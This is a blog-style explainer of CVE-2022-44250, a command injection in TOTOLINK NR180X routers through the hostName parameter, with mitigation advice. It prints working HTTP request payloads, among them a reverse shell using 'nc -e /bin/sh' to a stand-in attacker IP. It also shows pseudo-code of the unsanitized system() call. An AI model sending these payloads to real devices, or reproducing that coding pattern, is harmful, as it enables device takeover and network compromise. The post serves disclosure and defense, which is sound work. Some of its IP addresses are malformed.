CVE-2022-44250 - Command Injection in TOTOLINK NR180X (V9.1.u.6279_B20210910) via hostName Parameter

In today’s long read, we dive into CVE-2022-44250, a critical vulnerability found in the TOTOLINK NR180X router, specifically in firmware version V9.1.u.6279_B20210910. This vulnerability allows an attacker to remotely inject system commands through the web management interface by exploiting the hostName parameter in the setOpModeCfg function.

Let’s break down how this vulnerability works, detail the exploit process, and discuss the real risks for users of affected devices.

What is CVE-2022-44250?

CVE-2022-44250 is a command injection vulnerability in TOTOLINK NR180X routers. Remote attackers can execute arbitrary commands on the router’s operating system by sending crafted HTTP requests to the administrative web interface.

Impacted Product:

Technical Details

The flaw originates in the function setOpModeCfg, which is accessible via the router’s web management portal. Normally, the function expects a harmless value for the hostName parameter. But, the router firmware does *not properly sanitize* this input—meaning, whatever is sent gets directly processed by the underlying system shell.

Here’s what a regular configuration request might look like

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded
Cookie: SESSIONID=...

module=net&action=setOpModeCfg&hostName=myrouter&mode=ap

But, due to the bug, someone can abuse the hostName field like this

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded
Cookie: SESSIONID=...

module=net&action=setOpModeCfg&hostName=evil;ls;/tmp;&mode=ap

*Notice the semicolons (;)?* Anything after that gets executed by the Linux shell running on the router.

Vulnerable Code Snippet

Although the official firmware is closed, public write-ups and reverse engineering show vulnerable logic similar to:

// Pseudo-code illustrating the vulnerability
char name[64];
strcpy(name, http_get_param("hostName"));  // No sanitization!

char cmd[128];
sprintf(cmd, "uci set network.lan.hostname='%s'", name);
system(cmd);  // Direct execution, command injection possible!

Because copy and sprintf pass attacker-controlled data straight to the shell, it's easy to run commands as root on the router.

Step-by-Step Exploit Example

Let’s run through a real-world example of exploiting this vulnerability.

Step 1: Confirm the Service

Make sure the web interface is accessible (default IP is usually 192.168..1 or 192.168.1.1).

Step 2: Craft the Payload

Suppose you want to check if the device is vulnerable by making it create a test file. You can POST this:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded

module=net&action=setOpModeCfg&hostName=routertest;touch /tmp/pwned;&mode=ap

Step 3: Check if the File Exists

If you can access a file list or get output from the router, check for /tmp/pwned. That would confirm command execution.

An attacker may use a reverse shell command. Example payload

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168..1
Content-Type: application/x-www-form-urlencoded

module=net&action=setOpModeCfg&hostName=xyz;nc -e /bin/sh attacker_ip 4444;&mode=ap

This would open a shell to the attacker’s machine, giving them root control.

Risks and Real-World Impact

- Full device takeover: Attackers can alter settings, install malware, or add persistence on the router.
- Network compromise: All connected devices can be monitored or attacked; DNS settings could be changed for phishing.

Botnet inclusion: The router could be used in global attacks (DDoS, crypto-mining, etc.)

*Even if the web interface is only open internally, a compromised local device or a malicious browser extension could leverage this bug.*

Mitigation and Recommendations

- Update Firmware: TOTOLINK may have released a patched firmware—always use the latest version. Check support here.
- Restrict Management Access: Only allow HTTP(S) access from trusted hosts/networks.

Block Remote Management: Disable WAN-side admin portals if not needed.

- Monitor for Unusual Devices or Files: Unrecognized users or files (like /tmp/pwned) are red flags.

References and Further Reading

- Official NVD Entry - CVE-2022-44250
- Mitre CVE Page
- Exploit Details at Exploit-DB
- Seebug Advisory (Chinese)

*Note: Always use exploits responsibly. Never attack networks or devices without explicit permission!*

Conclusion

CVE-2022-44250 is a serious vulnerability in TOTOLINK routers, allowing command injection through unsanitized input. If you have this device—update immediately, limit who can access your admin interface, and stay aware of what’s connected to your network.

Stay safe, and keep your firmware updated!

*If you found this guide helpful, share it with IT administrators and anyone running a TOTOLINK router. Awareness is the first line of defense against attacks!*

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 08/08/2023 14:22:00 UTC